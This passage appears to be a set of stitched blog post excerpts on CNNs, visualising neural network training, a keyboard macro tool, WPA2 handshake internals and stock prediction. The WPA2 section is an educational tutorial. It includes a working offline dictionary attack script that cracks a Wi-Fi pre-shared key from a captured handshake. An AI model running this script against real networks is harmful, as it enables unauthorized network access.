Of special note in the above code is the specification of the CNN layers in the variable *ws*. The first layer is a convolutional layer with filter size 5x5x3. Notice that the filter extends the full depth of the image. 64 filters are used in this layer, resulting in an output volume with depth 64. The stride values in all dimensions are set to 1. This layer is followed by a max-pooling layer with a filter of height 3 and width 3. The stride along the height and width dimensions is set to 2, with the stride along the batch and channel dimensions set to 1.

The next layer is a convolutional layer with a 5x5x64 filter. 64 filters are used and the stride in all dimensions is again 1. This is followed by a pooling layer identical to the one above and then by 3 fully-connected layers. The final result is that images are distilled into 2-component row vectors representing the class scores. The CNNC class then converts these row vectors into labels using numpy.argmax and a dictionary.
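The final argmax-and-dictionary step can be illustrated in isolation. The following is a small self-contained sketch with made-up score values; the actual mapping inside CNNC may differ in detail:

```python
import numpy as np

#Hypothetical class-score rows for 3 images (2 classes: cat and dog)
scores = np.array([[0.9, 0.1],
                   [0.2, 0.8],
                   [0.6, 0.4]])
#Assumed mapping from column index to label string
ind2lab = {0: 'cat', 1: 'dog'}
#argmax along axis 1 picks the highest-scoring column for each row
labels = [ind2lab[i] for i in np.argmax(scores, axis = 1)]
print(labels)  #['cat', 'dog', 'cat']
```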

Figure 6 below shows a sample run of the above code.

**Figure 6: CNN Classification Results**

Note that even with the reduced number of parameters that CNNs afford, training the network can take a substantial amount of time. This performance can be improved by running training on the GPU using the CUDA-enabled version of TensorFlow.

]]>

The data set is assumed to contain sample vectors and target vectors whose components are only 1s and 0s. Thus, the sample and target vectors can be considered as bit strings, and these bit strings can in turn be thought of as unsigned integers. The following code converts a bit vector into its integer representation and back:

#Converts a binary vector (left to right format) to an integer
#x: A binary vector
#return: The corresponding integer
def BinVecToInt(x):
    #Accumulator variable
    num = 0
    #Place multiplier
    mult = 1
    for i in x:
        #Cast is needed to prevent conversion to floating point
        num = num + int(i) * mult
        #Multiply by 2
        mult <<= 1
    return num

#Converts an integer to a binary vector
def IntToBinVec(x, v = None):
    #If no vector is passed create a new one
    if(v is None):
        dim = int(np.log2(x)) + 1
        v = np.zeros([dim], dtype = np.int)
    #v will contain the binary vector
    c = 0
    while(x > 0):
        #If the vector has been filled; return truncating the rest
        if c >= len(v):
            break
        #Test if the LSB is set
        if(x & 1 == 1):
            #Set the bits in right-to-left order
            v[c] = 1
        #Onto the next column and bit
        c += 1
        x >>= 1
    return v

The above code works for arbitrary size binary vectors as Python’s built-in integer type can be of arbitrary size.
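As a quick self-contained sanity check of this convention (not reusing the functions above), the left-to-right LSB-first encoding can be verified against Python's built-in base-2 parsing by reversing the bits:

```python
#The vector [1, 0, 1, 1] with index 0 as the least significant bit
v = [1, 0, 1, 1]
#Reversing gives the conventional MSB-first string '1101'
n = int(''.join(str(b) for b in reversed(v)), 2)
print(n)  #13
#And back: format as binary, then reverse to recover LSB-first order
bits = [int(c) for c in reversed(format(n, 'b'))]
print(bits)  #[1, 0, 1, 1]
```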

Now the sample and target vectors can be transformed into integers. Using the above code, the original data set can be condensed into 2 dimensions and plotted on the standard Cartesian coordinate plane using MatPlotLib. In this transformation, the x-axis corresponds to the sample vectors and the y-axis corresponds to the target vectors. The following code uses MatPlotLib to produce an animation showing the target data and the model's prediction as successive training iterations pass.

#Plot the model R learning the data set A, Y
#R: A regression model
#A: The data samples
#Y: The target vectors
def PlotLearn(R, A, Y):
    intA = [BinVecToInt(j) for j in A]
    intY = [BinVecToInt(j) for j in Y]
    fig, ax = mpl.subplots(figsize = (20, 10))
    ax.plot(intA, intY, label = 'Orig')
    l, = ax.plot(intA, intY, label = 'Pred')
    ax.legend(loc = 'upper left')
    #Updates the plot in ax as model learns data
    def UpdateF(i):
        R.fit(A, Y)
        YH = R.predict(A)
        S = MSE(Y, YH)
        intYH = [BinVecToInt(j) for j in YH]
        l.set_ydata(intYH)
        ax.set_title('Iteration: ' + str(i * 64) + ' - MSE: ' + str(S))
        return l,
    ani = mpla.FuncAnimation(fig, UpdateF, frames = 2000, interval = 128, repeat = False)
    #ani.save('foo.mp4') #ffmpeg is required to save the animation to an mp4
    mpl.show()
    return ani

In the above code, the nested function *UpdateF* is known as a closure. Since functions are first-class citizens in Python, they can be created as local variables inside a function. This is useful in the above code as *UpdateF* can reference the MatPlotLib object in order to update the prediction data. Closures are a powerful if often overlooked part of Python that will be explored in a later topic.
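A minimal stand-alone example of a closure (unrelated to the plotting code, purely illustrative):

```python
def make_counter():
    count = 0
    #The nested function closes over 'count' from the enclosing scope
    def increment():
        nonlocal count
        count += 1
        return count
    return increment

c = make_counter()
print(c(), c(), c())  #1 2 3
```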

Notice that the animation object is returned from the function. This is due to an issue in MatPlotLib resulting from garbage collection.

Next, a quarter cup of popcorn can be placed in an air-popper and popped, the lights can be dimmed, and the performance of the network can be visualized in real-time as the network is trained.

**Figure 1: Video of Neural Network Performance over Time**

In practice, the above code can be used to visualize the point at which performance has become satisfactory. If the animation window is closed, execution will resume after the call to *PlotLearn*, and thus the model can then be used for subsequent prediction, saved to a file, etc.

**Note:** Spikes in the prediction graph are due to the fact that the Hamming distance between two bit vectors can be small while the Euclidean distance between their integer encodings can be arbitrarily large. For example, two vectors that differ in only the most significant bit position have a Hamming distance of 1, yet their integer encodings differ by half the encoding range.
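This effect is easy to demonstrate with a small self-contained sketch: flipping only the most significant bit of an 8-bit vector is a Hamming distance of 1 but a difference of 128 in the integer encoding:

```python
#Integer encoding with index 0 as the least significant bit
def bin_vec_to_int(x):
    return sum(int(b) << i for i, b in enumerate(x))

a = [0, 0, 0, 0, 0, 0, 0, 1]  #Only the most significant bit set
b = [0, 0, 0, 0, 0, 0, 0, 0]  #All bits clear
#Hamming distance: number of differing positions
hamming = sum(x != y for x, y in zip(a, b))
print(hamming)  #1
#Distance between the two integer encodings
print(abs(bin_vec_to_int(a) - bin_vec_to_int(b)))  #128
```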

]]>

Expansion is accomplished using low-level Windows API calls so that resource utilization is kept low. *ShortX* is useful for launching programs in Windows, for custom macros in games, and more. Program executables are available on the Software page.

To run the program, simply double-click the exe file or run it at the command prompt using:

shortx [flags]

where the available flags are as follows:

-c: Non-shortcut keystrokes are consumed.

-e: Expand macros using other macro definitions provided.

-h: Display help information.

-i: Specify path to the ini configuration file.

-s: Make ShortX start when the computer starts. If run as admin, this installs a registry key for all users (in HKEY_LOCAL_MACHINE).

-t: Amount of time to depress triggered keys. Note: key patterns separated by a comma are triggered in sequence.

-u: Uninstall *ShortX* from the registry (stops *ShortX* from starting at system start-up).

-v: Verbose mode. Display key names and codes to command window.

Please let me know what you think and if you have any requests, comments, or suggestions!

*N*

]]>

The first packet in the above trace is a *beacon frame* broadcast from the access point. Access points periodically transmit beacon frames to announce their presence to nearby devices. As seen in Figure 1 below, the destination address for the beacon frame is the broadcast address: FF:FF:FF:FF:FF:FF.

**Figure 1: Beacon Frame Destination MAC**

The beacon frame also contains the *SSID* field, which will be necessary in later steps. The SSID is the name of the network. As can be seen in Figure 2 below, the SSID for the access point in this packet capture is *Harkonen*.

**Figure 2: Beacon Frame SSID**

The next four packets of the capture comprise what is known as the WPA2 *4-way handshake*. This handshake is used to establish both the authenticity of the two endpoints and the encryption keys.

**Figure 3: 4-Way Handshake Sequence Diagram**

Figure 3 above shows a basic sequence diagram for the steps of the 4-way handshake. The following sections cover each step in detail.

In the first packet of the handshake, the access point sends a message to the station. A key part of this first step is the 256-bit WPA Key Nonce (number used once) field, also known as the *ANonce*. The ANonce is a randomly generated number that will be used to establish the pairwise transient key (PTK). The PTK is used to encrypt later communication between the access point and the station.

**Figure 4: ANonce Field**

Figure 4 above shows a capture with the WPA Key Nonce field of the first message highlighted.

After the station receives the first message, it generates its own nonce, referred to as the SNonce. The station, assuming it knows the PMK, then has enough information to generate the PTK. The PTK is computed as follows:

#Used for computing HMAC
import hmac
#Used to convert from hex to binary
from binascii import a2b_hex, b2a_hex
#Used for computing PMK
from hashlib import pbkdf2_hmac, sha1, md5

#Pseudo-random function for generation of
#the pairwise transient key (PTK)
#key: The PMK
#A: b'Pairwise key expansion'
#B: The apMac, cliMac, aNonce, and sNonce concatenated
#   like mac1 mac2 nonce1 nonce2
#   such that mac1 < mac2 and nonce1 < nonce2
#return: The ptk
def PRF(key, A, B):
    #Number of bytes in the PTK
    nByte = 64
    i = 0
    R = b''
    #Each iteration produces 160-bit value and 512 bits are required
    while(i <= ((nByte * 8 + 159) / 160)):
        hmacsha1 = hmac.new(key, A + chr(0x00).encode() + B + chr(i).encode(), sha1)
        R = R + hmacsha1.digest()
        i += 1
    return R[0:nByte]

#Make parameters for the generation of the PTK
#aNonce: The aNonce from the 4-way handshake
#sNonce: The sNonce from the 4-way handshake
#apMac: The MAC address of the access point
#cliMac: The MAC address of the client
#return: (A, B) where A and B are parameters
#        for the generation of the PTK
def MakeAB(aNonce, sNonce, apMac, cliMac):
    A = b"Pairwise key expansion"
    B = min(apMac, cliMac) + max(apMac, cliMac) + min(aNonce, sNonce) + max(aNonce, sNonce)
    return (A, B)

#Compute the 1st message integrity check for a WPA 4-way handshake
#pwd: The password to test
#ssid: The ssid of the AP
#A: b'Pairwise key expansion'
#B: The apMac, cliMac, aNonce, and sNonce concatenated
#   like mac1 mac2 nonce1 nonce2
#   such that mac1 < mac2 and nonce1 < nonce2
#data: A list of 802.1x frames with the MIC field zeroed
#return: (x, y, z) where x is the mic, y is the PTK, and z is the PMK
def MakeMIC(pwd, ssid, A, B, data, wpa = False):
    #Create the pairwise master key using 4096 iterations of hmac-sha1
    #to generate a 32 byte value
    pmk = pbkdf2_hmac('sha1', pwd.encode('ascii'), ssid.encode('ascii'), 4096, 32)
    #Make the pairwise transient key (PTK)
    ptk = PRF(pmk, A, B)
    #WPA uses md5 to compute the MIC while WPA2 uses sha1
    hmacFunc = md5 if wpa else sha1
    #Create the MICs using HMAC-SHA1 of data and return all computed values
    mics = [hmac.new(ptk[0:16], i, hmacFunc).digest() for i in data]
    return (mics, ptk, pmk)

**Note:** The above code assumes that the PMK is computed based on a *pre-shared key* (PSK). This is known as WPA2-PSK and is common for home Wi-Fi networks. In WPA2-PSK, the PMK is computed using PBKDF2 and HMAC-SHA1 as seen in the above code.
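In isolation, the PMK derivation for WPA2-PSK is a single PBKDF2 call. A minimal sketch using the PSK and SSID from this capture follows; the resulting value matches the pmk line in the sample output shown later in the post:

```python
from hashlib import pbkdf2_hmac
from binascii import b2a_hex

#WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(psk, ssid, 4096 iterations, 32 bytes)
pmk = pbkdf2_hmac('sha1', b'12345678', b'Harkonen', 4096, 32)
print(b2a_hex(pmk).decode().upper())
```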

In the second message, the station responds to the access point. Two key components of the second message are the 256-bit SNonce that was computed earlier and the 128-bit message integrity check (MIC). The SNonce is the last piece of information the access point needs to compute the PTK. The MIC verifies that the station knows the PTK, and thus also the PMK. The SNonce field is highlighted below in Figure 5.

**Figure 5: SNonce Field**

The ANonce and SNonce are randomly generated numbers to prevent *replay attacks*: an attack in which an attacker attempts to authenticate using a previously captured packet. From above it can be seen that the PTK depends upon the ANonce and SNonce, and thus it differs from connection to connection; a technique which thwarts replay attacks.

Notice, however, that up to this point authentication has not yet been performed; neither side has verified if the other actually knows the PMK. This is the task of the WPA Key MIC field, seen below in Figure 6.

**Figure 6: WPA Key MIC 1**

The WPA Key MIC field is computed by taking all of the 802.1x fields and computing an HMAC over them. When the computation is performed, the MIC field itself is set to all zeros. **Note:** For WPA the hash function used is **MD5**, while for WPA2 the **SHA1** algorithm is used. Figure 7 below shows the data to be used highlighted in Wireshark. Since MD5 produces a 128-bit value and SHA1 produces a 160-bit value, only the first 128 bits of the digest are preserved. This can be accomplished by discarding the last 8 hex characters.

**Figure 7: Data Section of WPA2 EAPOL Packet 2**
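The HMAC-and-truncate step can be sketched on its own with placeholder values (the key and frame bytes below are dummies, not taken from the capture):

```python
import hmac
from hashlib import sha1

#Placeholder: the first 16 bytes of the PTK (the key confirmation key)
kck = b'\x00' * 16
#Placeholder 802.1x frame with the MIC field already zeroed
frame = b'\x01\x03\x00\x5f' + b'\x00' * 92
#SHA1 produces a 160-bit (20 byte) digest...
digest = hmac.new(kck, frame, sha1).digest()
#...of which only the first 128 bits (16 bytes) are kept as the MIC
mic = digest[:16]
print(len(digest), len(mic))  #20 16
```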

As can be seen from the above, the MIC can only be computed if the PTK, and thus the PMK, is known. By defining the MIC in this way, each side can verify that the other knows the PMK without ever transmitting the PMK. A third party that witnesses the 4-way handshake still cannot determine the PMK or PTK.

The third packet of the 4-way handshake is similar in spirit to that of the second. Notice in Figure 8 below that it also contains a WPA Key MIC and WPA Key Data field. The MIC field will serve to authenticate the access point to the station. Upon verification of the MIC, the station knows that the access point is in possession of the PTK and thus the PMK. It is assumed that only the genuine access point knows the PMK and thus the authenticity of the access point is confirmed. The method for computing the second MIC is the same as the first.

**Figure 8: WPA Key MIC 2**

The third packet of the 4-way handshake also contains the group temporal key (GTK) which is used to encrypt and decrypt all broadcast data transmissions between the access point and its clients. The GTK is encrypted inside the WPA Key Data field of the third packet.

The final packet of the 4-way handshake is an acknowledgement to the access point that the station has received the appropriate keys and that encrypted communication will begin. The fourth packet also contains a MIC field which is computed in the same way as the previous MICs.

Using the above Python code, the PTK, PMK, and MICs can be computed for the given packet capture. The following code initializes variables containing the fields extracted from the packet capture. Then the MICs, PTK, and PMK are computed. Finally, the PTK and PMK are displayed and the computed MICs are compared to the actual MICs.

#Run a brief test showing the computation of the PTK, PMK, and MICs
#for a 4-way handshake
def RunTest():
    #the pre-shared key (PSK)
    psk = "12345678"
    #ssid name
    ssid = "Harkonen"
    #ANonce
    aNonce = a2b_hex('225854b0444de3af06d1492b852984f04cf6274c0e3218b8681756864db7a055')
    #SNonce
    sNonce = a2b_hex("59168bc3a5df18d71efb6423f340088dab9e1ba2bbc58659e07b3764b0de8570")
    #Authenticator MAC (AP)
    apMac = a2b_hex("00146c7e4080")
    #Station address: MAC of client
    cliMac = a2b_hex("001346fe320c")
    #The first MIC
    mic1 = "d5355382b8a9b806dcaf99cdaf564eb6"
    #The entire 802.1x frame of the second handshake message with the MIC field set to all zeros
    data1 = a2b_hex("0103007502010a0010000000000000000159168bc3a5df18d71efb6423f340088dab9e1ba2bbc58659e07b3764b0de8570000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020100")
    #The second MIC
    mic2 = "1e228672d2dee930714f688c5746028d"
    #The entire 802.1x frame of the third handshake message with the MIC field set to all zeros
    data2 = a2b_hex("010300970213ca00100000000000000002225854b0444de3af06d1492b852984f04cf6274c0e3218b8681756864db7a055192eeef7fd968ec80aee3dfb875e8222370000000000000000000000000000000000000000000000000000000000000000383ca9185462eca4ab7ff51cd3a3e6179a8391f5ad824c9e09763794c680902ad3bf0703452fbb7c1f5f1ee9f5bbd388ae559e78d27e6b121f")
    #The third MIC
    mic3 = "9dc81ca6c4c729648de7f00b436335c8"
    #The entire 802.1x frame of the fourth handshake message with the MIC field set to all zeros
    data3 = a2b_hex("0103005f02030a0010000000000000000200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
    #Create parameters for the creation of the PTK, PMK, and MICs
    A, B = MakeAB(aNonce, sNonce, apMac, cliMac)
    #Generate the MICs, the PTK, and the PMK
    mics, ptk, pmk = MakeMIC(psk, ssid, A, B, [data1, data2, data3])
    #Display the pairwise master key (PMK)
    pmkStr = b2a_hex(pmk).decode().upper()
    print("pmk:\t\t" + pmkStr + '\n')
    #Display the pairwise transient key (PTK)
    ptkStr = b2a_hex(ptk).decode().upper()
    print("ptk:\t\t" + ptkStr + '\n')
    #Display the desired MIC1 and compare to target MIC1
    mic1Str = mic1.upper()
    print("desired mic:\t" + mic1Str)
    #Take the first 128-bits of the 160-bit SHA1 hash
    micStr = b2a_hex(mics[0]).decode().upper()[:-8]
    print("actual mic:\t" + micStr)
    print('MATCH\n' if micStr == mic1Str else 'MISMATCH\n')
    #Display the desired MIC2 and compare to target MIC2
    mic2Str = mic2.upper()
    print("desired mic:\t" + mic2Str)
    #Take the first 128-bits of the 160-bit SHA1 hash
    micStr = b2a_hex(mics[1]).decode().upper()[:-8]
    print("actual mic:\t" + micStr)
    print('MATCH\n' if micStr == mic2Str else 'MISMATCH\n')
    #Display the desired MIC3 and compare to target MIC3
    mic3Str = mic3.upper()
    print("desired mic:\t" + mic3Str)
    #Take the first 128-bits of the 160-bit SHA1 hash
    micStr = b2a_hex(mics[2]).decode().upper()[:-8]
    print("actual mic:\t" + micStr)
    print('MATCH\n' if micStr == mic3Str else 'MISMATCH\n')
    return

The output for the above code is shown in the following code block.

pmk:		EE51883793A6F68E9615FE73C80A3AA6F2DD0EA537BCE627B929183CC6E57925

ptk:		EA0E404633C802450302868CCAA749DE5CBA5ABCB267E2DE1D5E21E57ACCD5079B31E9FF220E132AE4F6ED9EF1ACC88545825FC32EE55961395AE43734D6C107

desired mic:	D5355382B8A9B806DCAF99CDAF564EB6
actual mic:	D5355382B8A9B806DCAF99CDAF564EB6
MATCH

desired mic:	1E228672D2DEE930714F688C5746028D
actual mic:	1E228672D2DEE930714F688C5746028D
MATCH

desired mic:	9DC81CA6C4C729648DE7F00B436335C8
actual mic:	9DC81CA6C4C729648DE7F00B436335C8
MATCH

Notice that since the MICs match, the provided PSK is correct. If the PSK is instead changed to “abcdefgh”, notice that the MICs no longer match.

pmk:		EBB5D703F8834A08D61A67A982FA009E08F747DD65D82C240169E604218B3ACF

ptk:		63E412CE67759BD5CEBD0F5B5A487CA155ADD51D771293E31C05BF05A3A98BCFE645F29203956E34C6A5B0CC2186B1161F643807349576CDB2FB1C158B03648F

desired mic:	D5355382B8A9B806DCAF99CDAF564EB6
actual mic:	C2EE0E125962261C897A05E33B579F5C
MISMATCH

desired mic:	1E228672D2DEE930714F688C5746028D
actual mic:	6D60808DE292A32BAE1D381B3D295B2F
MISMATCH

desired mic:	9DC81CA6C4C729648DE7F00B436335C8
actual mic:	D5F07A0FBC8F376541D46591FDA74470
MISMATCH

In this way, PSKs can be guessed and the corresponding MICs computed until a match is found. This type of attack is known as an offline *dictionary attack*. The following Python code reads a file passwd.txt containing one PSK per line and tests each one until the list is exhausted or a matching password is found.

#Tests a list of passwords; if the correct one is found it
#prints it to the screen and returns it
#S: A list of passwords to test
#ssid: The ssid of the AP
#aNonce: The ANonce as a byte array
#sNonce: The SNonce as a byte array
#apMac: The AP's MAC address
#cliMac: The MAC address of the client (aka station)
#data: The 802.1x frame of the second message with the MIC field zeroed
#data2: The 802.1x frame of the third message with the MIC field zeroed
#data3: The 802.1x frame of the fourth message with the MIC field zeroed
#targMic: The MIC for message 2
#targMic2: The MIC for message 3
#targMic3: The MIC for message 4
def TestPwds(S, ssid, aNonce, sNonce, apMac, cliMac, data, data2, data3, targMic, targMic2, targMic3):
    #Pre-computed values
    A, B = MakeAB(aNonce, sNonce, apMac, cliMac)
    #Loop over each password and test each one
    for i in S:
        mic, _, _ = MakeMIC(i, ssid, A, B, [data])
        v = b2a_hex(mic[0]).decode()[:-8]
        #First MIC doesn't match
        if(v != targMic):
            continue
        #First MIC matched... Try second
        mic2, _, _ = MakeMIC(i, ssid, A, B, [data2])
        v2 = b2a_hex(mic2[0]).decode()[:-8]
        if(v2 != targMic2):
            continue
        #First 2 match... Try last
        mic3, _, _ = MakeMIC(i, ssid, A, B, [data3])
        v3 = b2a_hex(mic3[0]).decode()[:-8]
        if(v3 != targMic3):
            continue
        #All of them match
        print('!!!Password Found!!!')
        print('Desired MIC1:\t\t' + targMic)
        print('Computed MIC1:\t\t' + v)
        print('\nDesired MIC2:\t\t' + targMic2)
        print('Computed MIC2:\t\t' + v2)
        print('\nDesired MIC3:\t\t' + targMic3)
        print('Computed MIC3:\t\t' + v3)
        print('Password:\t\t' + i)
        return i
    return None

if __name__ == "__main__":
    RunTest()
    #Read a file of passwords containing
    #passwords separated by a newline
    with open('passwd.txt') as f:
        S = []
        for l in f:
            S.append(l.strip())
    #ssid name
    ssid = "Harkonen"
    #ANonce
    aNonce = a2b_hex('225854b0444de3af06d1492b852984f04cf6274c0e3218b8681756864db7a055')
    #SNonce
    sNonce = a2b_hex("59168bc3a5df18d71efb6423f340088dab9e1ba2bbc58659e07b3764b0de8570")
    #Authenticator MAC (AP)
    apMac = a2b_hex("00146c7e4080")
    #Station address: MAC of client
    cliMac = a2b_hex("001346fe320c")
    #The first MIC
    mic1 = "d5355382b8a9b806dcaf99cdaf564eb6"
    #The entire 802.1x frame of the second handshake message with the MIC field set to all zeros
    data1 = a2b_hex("0103007502010a0010000000000000000159168bc3a5df18d71efb6423f340088dab9e1ba2bbc58659e07b3764b0de8570000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020100")
    #The second MIC
    mic2 = "1e228672d2dee930714f688c5746028d"
    #The entire 802.1x frame of the third handshake message with the MIC field set to all zeros
    data2 = a2b_hex("010300970213ca00100000000000000002225854b0444de3af06d1492b852984f04cf6274c0e3218b8681756864db7a055192eeef7fd968ec80aee3dfb875e8222370000000000000000000000000000000000000000000000000000000000000000383ca9185462eca4ab7ff51cd3a3e6179a8391f5ad824c9e09763794c680902ad3bf0703452fbb7c1f5f1ee9f5bbd388ae559e78d27e6b121f")
    #The third MIC
    mic3 = "9dc81ca6c4c729648de7f00b436335c8"
    #The entire 802.1x frame of the fourth handshake message with the MIC field set to all zeros
    data3 = a2b_hex("0103005f02030a0010000000000000000200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
    #Run an offline dictionary attack against the access point
    TestPwds(S, ssid, aNonce, sNonce, apMac, cliMac, data1, data2, data3, mic1, mic2, mic3)

**Note:** Please use the above code responsibly. There are many other tools available to perform such dictionary attacks. The above is provided *only* for educational purposes.

]]>

**Note:** See a later post, Visualizing Neural Network Performance on High-Dimensional Data, for code to help visualize neural network learning and performance.

The latest stock data for Yahoo can be found at the following link. Instead of using LibreOffice to parse the date strings, the *datetime* library in Python can be used. The strptime function parses dates given a special *format string*. The format string in the code below specifies that the dates are of the form yyyy-mm-dd, also known as ISO 8601 format.

Code to load the spreadsheet and parse the dates follows.

#Used for numpy arrays
import numpy as np
#Used to read data from CSV file
import pandas as pd
#Used to convert date string to numerical value
from datetime import datetime, timedelta
#Used to plot data
import matplotlib.pyplot as mpl

#Load data from the CSV file. Note: Some systems are unable
#to give timestamps for dates before 1970. This function may
#fail on such systems.
#
#path: The path to the file
#return: A data frame with the parsed timestamps
def ParseData(path):
    #Read the csv file into a dataframe
    df = pd.read_csv(path)
    #Get the date strings from the date column
    dateStr = df['Date'].values
    D = np.zeros(dateStr.shape)
    #Convert all date strings to a numeric value
    for i, j in enumerate(dateStr):
        #Date strings are of the form year-month-day
        D[i] = datetime.strptime(j, '%Y-%m-%d').timestamp()
    #Add the newly parsed column to the dataframe
    df['Timestamp'] = D
    #Remove any unused columns (axis = 1 specifies fields are columns)
    return df.drop('Date', axis = 1)

**Note:** A quick plot of the data reveals what seems to be a typo in the Feb 01, 2016 data row, with the “Low” value listed as 2016.02. The *pyplot* module of the matplotlib library provides powerful tools for visualizing data sets. Plotting a data set is useful both for visualization and for catching outliers and typos. The erroneous data point can be removed entirely or modified to a reasonable value as desired. The following code will plot the stock data, set the x-axis labels, and add a legend.

#Given dataframe from ParseData
#plot it to the screen
#
#df: Dataframe returned from ParseData
#p: The position of the predicted data points
def PlotData(df, p = None):
    if(p is None):
        p = np.array([])
    #p contains the indices of predicted data; the rest are actual points
    c = np.array([i for i in range(df.shape[0]) if i not in p])
    #Timestamp data
    ts = df.Timestamp.values
    #Number of x tick marks
    nTicks = 10
    #Left most x value
    s = np.min(ts)
    #Right most x value
    e = np.max(ts)
    #Total range of x values
    r = e - s
    #Add some buffer on both sides
    s -= r / 5
    e += r / 5
    #These will be the tick locations on the x axis
    tickMarks = np.arange(s, e, (e - s) / nTicks)
    #Convert timestamps to strings
    strTs = [datetime.fromtimestamp(i).strftime('%m-%d-%y') for i in tickMarks]
    mpl.figure()
    #Plots of the high and low values for the day
    mpl.plot(ts, df.High.values, color = '#7092A8', linewidth = 1.618, label = 'Actual')
    #Predicted data was also provided
    if(len(p) > 0):
        mpl.plot(ts[p], df.High.values[p], color = '#6F6F6F', linewidth = 1.618, label = 'Predicted')
    #Set the tick marks
    mpl.xticks(tickMarks, strTs, rotation = 'vertical')
    #Add the label in the upper left
    mpl.legend(loc = 'upper left')
    mpl.show()

A plot of the data set produced by the above code is shown below in Figure 1.

**Figure 1: Historical Yahoo Inc Stock Data**
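Returning to the typo noted above, one way to repair the bad row is sketched below on a toy frame (the column name 'Low' and the value 2016.02 come from the note; the replacement value of 26.5 is an arbitrary stand-in):

```python
import pandas as pd

#Toy frame standing in for the parsed spreadsheet
df = pd.DataFrame({'Low': [26.1, 2016.02, 26.8]})
#Option 1: drop rows with implausibly large values...
dropped = df[df['Low'] < 1000.0]
#Option 2: ...or overwrite them with a reasonable value
df.loc[df['Low'] > 1000.0, 'Low'] = 26.5
print(len(dropped), df['Low'].tolist())  #2 [26.1, 26.5, 26.8]
```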

In the previous post, only the numericized date was used as input to the regression model. It is dubious that the date alone provides much useful information about the stock price of a company. To improve the model, more of the information from the spreadsheet is used. A sample is constructed as the current timestamp together with, for each of the past *n* days, the opening value, closing value, high value, low value, adjusted closing value, volume, and timestamp. Thus, if data for the past *n* days is used, each sample contains 7*n* + 1 features. If past data is unavailable, the oldest available values are used instead.

The corresponding target values are the stock opening value, closing value, high value, low value, adjusted closing value, and volume fields. The timestamp obviously does not need to be predicted.

A Python class is constructed which takes the number of past days to use and a regression model providing the scikit-learn interface as arguments. The class uses the *Learn* function to fit a dataframe returned from the *ParseData* function. Next, the stock values can be predicted for a range of dates using the *PredictDate* function. Source code follows.

#Used to scale the input data
from sklearn.preprocessing import StandardScaler

#Gives a list of timestamps from the start date to the end date
#
#startDate: The start date as a string xxxx-xx-xx
#endDate: The end date as a string year-month-day
#weekends: True if weekends should be included; false otherwise
#return: A numpy array of timestamps
def DateRange(startDate, endDate, weekends = False):
    #The start and end date
    sd = datetime.strptime(startDate, '%Y-%m-%d')
    ed = datetime.strptime(endDate, '%Y-%m-%d')
    #Invalid start and end dates
    if(sd > ed):
        raise ValueError("The start date cannot be later than the end date.")
    #One day
    day = timedelta(1)
    #The final list of timestamp data
    dates = []
    cd = sd
    while(cd <= ed):
        #If weekends are included or it's a weekday append the current ts
        if(weekends or (cd.date().weekday() != 5 and cd.date().weekday() != 6)):
            dates.append(cd.timestamp())
        #Onto the next day
        cd = cd + day
    return np.array(dates)

#Given a date, returns the previous day
#
#startDate: The start date as a timestamp
#weekends: True if weekends should be counted; false otherwise
def DatePrevDay(startDate, weekends = False):
    #One day
    day = timedelta(1)
    cd = datetime.fromtimestamp(startDate)
    while(True):
        cd = cd - day
        if(weekends or (cd.date().weekday() != 5 and cd.date().weekday() != 6)):
            return cd.timestamp()
    #Should never happen
    return None

#A class that predicts stock prices based on historical stock data
class StockPredictor:

    #The (scaled) data frame
    D = None
    #Unscaled timestamp data
    DTS = None
    #The data matrix
    A = None
    #Target value matrix
    y = None
    #Corresponding columns for target values
    targCols = None
    #Number of previous days of data to use
    npd = 1
    #The regressor model
    R = None
    #Object to scale input data
    S = None

    #Constructor
    #rmodel: The regressor model to use (sklearn)
    #nPastDays: The number of past days to include in each sample
    #scaler: The scaler object used to scale the data (sklearn)
    def __init__(self, rmodel, nPastDays = 1, scaler = StandardScaler()):
        self.npd = nPastDays
        self.R = rmodel
        self.S = scaler

    #Extracts features from stock market data
    #
    #D: A dataframe from ParseData
    #ret: The data matrix of samples
    def _ExtractFeat(self, D):
        #One row per day of stock data
        m = D.shape[0]
        #Number of features per sample
        n = self._GetNumFeatures()
        B = np.zeros([m, n])
        #Preserve order of spreadsheet
        for i in range(m - 1, -1, -1):
            self._GetSample(B[i], i, D)
        #Return the internal numpy array
        return B

    #Extracts the target values from stock market data
    #
    #D: A dataframe from ParseData
    #ret: The data matrix of targets and the corresponding column names
    def _ExtractTarg(self, D):
        #Timestamp column is not predicted
        tmp = D.drop('Timestamp', axis = 1)
        #Return the internal numpy array
        return tmp.values, tmp.columns

    #Get the number of features in the data matrix
    #
    #n: The number of previous days to include
    #   self.npd is used if n is None
    #ret: The number of features in the data matrix
    def _GetNumFeatures(self, n = None):
        if(n is None):
            n = self.npd
        return n * 7 + 1

    #Get the sample for a specific row in the dataframe.
    #A sample consists of the current timestamp and the data from
    #the past n rows of the dataframe
    #
    #r: The array to fill with data
    #i: The index of the row for which to build a sample
    #df: The dataframe to use
    #return: r
    def _GetSample(self, r, i, df):
        #First value is the timestamp
        r[0] = df['Timestamp'].values[i]
        #The number of columns in df
        n = df.shape[1]
        #The last valid index
        lim = df.shape[0]
        #Each sample contains the past n days of stock data; for non-existing data
        #repeat last available sample
        #Format of row:
        #Timestamp Volume Open[i] High[i] ... Open[i-1] High[i-1] ... etc
        for j in range(0, self.npd):
            #Subsequent rows contain older data in the spreadsheet
            ind = i + j + 1
            #If there is no older data, duplicate the oldest available values
            if(ind >= lim):
                ind = lim - 1
            #Add all columns from row[ind]
            for k, c in enumerate(df.columns):
                #+ 1 is needed as timestamp is at index 0
                r[k + 1 + n * j] = df[c].values[ind]
        return r

    #Attempts to learn the stock market data
    #given a dataframe taken from ParseData
    #
    #D: A dataframe from ParseData
    def Learn(self, D):
        #Keep track of the currently learned data
        self.D = D.copy()
        #Keep track of old timestamps for indexing
        self.DTS = np.copy(D.Timestamp.values)
        #Scale the data
        self.D[self.D.columns] = self.S.fit_transform(self.D)
        #Get features from the data frame
        self.A = self._ExtractFeat(self.D)
        #Get the target values and their corresponding column names
        self.y, self.targCols = self._ExtractTarg(self.D)
        #Create the regressor model and fit it
        self.R.fit(self.A, self.y)

